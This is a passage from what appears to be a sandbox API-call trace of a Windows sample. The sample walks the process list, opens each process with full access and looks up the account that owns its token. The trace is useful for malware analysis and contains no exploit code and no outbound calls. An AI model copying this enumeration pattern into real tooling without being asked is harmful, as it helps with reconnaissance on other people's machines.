SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.622] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.622] CloseHandle (hObject=0x240) returned 1 [0124.622] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="frame.exe")) returned 1 [0124.623] SetLastError (dwErrCode=0x0) [0124.623] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x57c) returned 0x240 [0124.623] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x224) returned 1 [0124.623] GetTokenInformation (in: TokenHandle=0x224, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.623] GetTokenInformation (in: TokenHandle=0x224, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.623] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.624] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.624] CloseHandle (hObject=0x240) returned 1 [0124.624] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x770, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="help_todd_ferrari.exe")) returned 1 [0124.625] SetLastError (dwErrCode=0x0) [0124.625] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x770) returned 0x240 [0124.625] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x234) returned 1 [0124.625] GetTokenInformation (in: TokenHandle=0x234, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.625] GetTokenInformation (in: TokenHandle=0x234, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.625] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.625] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.626] CloseHandle (hObject=0x240) returned 1 [0124.626] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="receiversolstunning.exe")) returned 1 [0124.626] SetLastError (dwErrCode=0x0) [0124.626] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7a8) returned 0x240 [0124.627] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x23c) returned 1 [0124.627] GetTokenInformation (in: TokenHandle=0x23c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.627] GetTokenInformation (in: TokenHandle=0x23c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.627] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.675] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.676] CloseHandle (hObject=0x240) returned 1 [0124.676] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="guru-utc-truly.exe")) returned 1 [0124.677] SetLastError (dwErrCode=0x0) [0124.677] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x434) returned 0x240 [0124.677] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x68) returned 1 [0124.677] GetTokenInformation (in: TokenHandle=0x68, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.677] GetTokenInformation (in: TokenHandle=0x68, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.677] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.677] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.678] CloseHandle (hObject=0x240) returned 1 [0124.678] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="knows.exe")) returned 1 [0124.678] SetLastError (dwErrCode=0x0) [0124.678] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x79c) returned 0x240 [0124.678] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x238) returned 1 [0124.678] GetTokenInformation (in: TokenHandle=0x238, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.678] GetTokenInformation (in: TokenHandle=0x238, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.678] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.679] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.679] CloseHandle (hObject=0x240) returned 1 [0124.679] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="helpsbelly.exe")) returned 1 [0124.680] SetLastError (dwErrCode=0x0) [0124.680] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x518) returned 0x240 [0124.680] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x250) returned 1 [0124.680] GetTokenInformation (in: TokenHandle=0x250, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.680] GetTokenInformation (in: TokenHandle=0x250, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.680] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.681] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.681] CloseHandle (hObject=0x240) returned 1 [0124.681] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gathering laptop polished.exe")) returned 1 [0124.682] SetLastError (dwErrCode=0x0) [0124.682] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x240 [0124.682] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x254) returned 1 [0124.682] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.682] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.682] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.682] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.683] CloseHandle (hObject=0x240) returned 1 [0124.683] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="diary-oh.exe")) returned 1 [0124.683] SetLastError (dwErrCode=0x0) [0124.684] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x170) returned 0x240 [0124.684] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x258) returned 1 [0124.684] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.684] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.684] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.684] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.685] CloseHandle (hObject=0x240) returned 1 [0124.685] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ranking_attributes_composed.exe")) returned 1 [0124.685] SetLastError (dwErrCode=0x0) [0124.685] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x218) returned 0x240 [0124.685] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x25c) returned 1 [0124.685] GetTokenInformation (in: TokenHandle=0x25c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.685] GetTokenInformation (in: TokenHandle=0x25c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.686] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.686] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.687] CloseHandle (hObject=0x240) returned 1 [0124.687] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x6a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="wantedmarkerbag.exe")) returned 1 [0124.687] SetLastError (dwErrCode=0x0) [0124.687] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x6a0) returned 0x240 [0124.687] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x260) returned 1 [0124.687] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.688] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.688] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.688] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.689] CloseHandle (hObject=0x240) returned 1 [0124.689] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ways_rice.exe")) returned 1 [0124.690] SetLastError (dwErrCode=0x0) [0124.690] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x5d0) returned 0x240 [0124.690] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x264) returned 1 [0124.690] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.690] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.690] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.690] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.691] CloseHandle (hObject=0x240) returned 1 [0124.691] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="battery-prostate-packard.exe")) returned 1 [0124.692] SetLastError (dwErrCode=0x0) [0124.692] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x210) returned 0x240 [0124.692] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x268) returned 1 [0124.692] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.692] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.692] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, 